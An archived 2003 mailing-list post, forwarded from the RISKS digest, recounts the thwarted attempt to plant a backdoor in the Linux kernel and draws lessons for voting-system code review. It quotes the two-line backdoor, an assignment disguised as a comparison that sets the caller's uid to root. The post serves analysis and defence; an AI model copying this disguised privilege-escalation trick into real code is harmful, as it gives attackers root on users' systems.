[Politech] How a backdoor in the Linux kernel was thwarted, from RISKS

From: Declan McCullagh (declan@private)
Date: Wed Nov 12 2003 - 12:31:04 PST

Next message: Declan McCullagh: "[Politech] VeriSign replies to Politech post over Flash-based "Trust Mark""

Previous message: Declan McCullagh: "[Politech] Belkin responds to router-advertisement controversy [sp]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

---

Date: Tue, 11 Nov 2003 09:21:16 -0600
From: "Douglas W. Jones" <jones@private>
Subject: Thwarted Linux backdoor

On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted.  This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.

Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:

         if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                         retval = -EINVAL;

This was done in the code sys_wait4().  Larry McVoy caught the fact that the
change had been made, and was annoyed because it wasn't logged properly.
Matthew Dharm asked "Out of curiosity, what were the changed lines."  Zwane
Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
you hope to get root."

So, an annoying violation of the software change logging requirements turned
out to be an attempt to install a backdoor in Linux.  At least two very
experienced programmers looked at it and saw just slightly odd code, before
the serious nature of the threat was actually discovered.

This particular attack, by the way, is ruled out by the current voting
system standards, not because they require a comprehensive security
analysis, but because of their C-centered coding rules.  Embedded assignment
is forbidden.  Current source code checks are good at finding embedded
assignments and flagging them (as long as the code is written in C).  No
doubt, a hacker of the sophistication suggested by the attack illustrated
above would strictly adhere to the coding guidelines in formulating their
attack.

For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:

     http://kerneltrap.org/node/view/1584
     Linux: Kernel "Back Door" Attempt

This attack has only made the mainstream media in one place, so far:

     http://www.smh.com.au/articles/2003/11/07/1068013371170.html
     Bid to backdoor Linux kernel detected - smh.com.au

This is a pity, because I think this story is really important.

_______________________________________________
Politech mailing list
Archived at http://www.politechbot.com/
Moderated by Declan McCullagh (http://www.mccullagh.org/)

Next message: Declan McCullagh: "[Politech] VeriSign replies to Politech post over Flash-based "Trust Mark""
Previous message: Declan McCullagh: "[Politech] Belkin responds to router-advertisement controversy [sp]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 12 2003 - 12:45:54 PST